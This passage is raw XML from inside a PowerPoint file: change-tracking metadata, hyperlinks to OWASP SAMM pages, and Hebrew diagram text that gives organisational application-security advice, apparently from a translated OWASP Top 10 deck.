            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:spMk id="3" creationId="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-14T05:55:37.049" v="2143" actId="108"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1107843752" sldId="322"/>
            <ac:graphicFrameMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:32.265" v="2152" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2323774989" sldId="323"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:33:32.265" v="2152" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2323774989" sldId="323"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add modTransition">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{41D4F4EF-8154-4522-94CF-7BB22F3606B9}" dt="2017-11-18T17:45:13.877" v="2155" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201333637" sldId="324"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}"/>
    <pc:docChg chg="undo modSld">
      <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2630728331" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:38:51.545" v="30" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="108" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:42:37.562" v="87" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:spMk id="109" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod modGraphic">
          <ac:chgData name="Andrew van der Stock" userId="dd17ceffa52ddf7f" providerId="LiveId" clId="{5A569433-C3B6-495E-8280-8AA394FBBF58}" dt="2017-11-04T00:39:39.687" v="54" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2630728331" sldId="309"/>
            <ac:graphicFrameMk id="34" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
</pc:chgInfo>
</file>

<file path=ppt/diagrams/_rels/data1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/colors1.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A2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/vList5" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple3" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent4_2" csCatId="accent4" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>התחל</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>גישה לניהול סיכונים</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" type="parTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D22B1E2D-9241-472F-8A9E-565E70887137}" type="sibTrans" cxnId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>בסס יסודות איתנים</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E44837D-D7DC-4906-821E-A6950790F46F}" type="parTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" type="sibTrans" cxnId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="1050" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>שלב אבטחה בתהליכים קיימים</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66AC70C4-7AD9-4A02-8E8E-9E86DB315614}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="r" defTabSz="422275" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>תעדו את כל היישומים ונכסי המידע המקושרים אליהם. ארגונים גדולים צריכים לשקול להטמיע פתרון </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Configuration Management Database (CMDB)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> למטרה זו.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C530E7A8-2FBF-4B88-8E0C-5FA25BF64DDB}" type="parTrans" cxnId="{E196842F-A92D-4B71-B99D-08A01EB41D36}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91A6A15A-39BE-463B-BE50-61A5DAA31260}" type="sibTrans" cxnId="{E196842F-A92D-4B71-B99D-08A01EB41D36}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D379F1C2-B8BC-4B70-BF67-538728E7556E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="r" defTabSz="422275" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>יישמו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>תוכנית פיתוח מאובטח</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> ואמצו אותה.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65B578C9-8FCF-4A94-AB95-F2C605EB9CB1}" type="parTrans" cxnId="{71C59095-8F1F-4F0B-85C2-98C255085B57}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB006015-E88A-4731-AEE0-50BCB317D74E}" type="sibTrans" cxnId="{71C59095-8F1F-4F0B-85C2-98C255085B57}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FAC2C12-BB69-4B16-82C9-9193A674BBDA}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="r" defTabSz="422275" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נהלו </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>סקר פערי יכולות המשווה את הארגון שלך לארגונים דומים</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:hueOff val="0"/>
                  <a:satOff val="0"/>
                  <a:lumOff val="0"/>
                  <a:alphaOff val="0"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> על-מנת להגדיר נושאי התייעלות ולהריץ תוכנית פעולה.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="000000">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:srgbClr>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
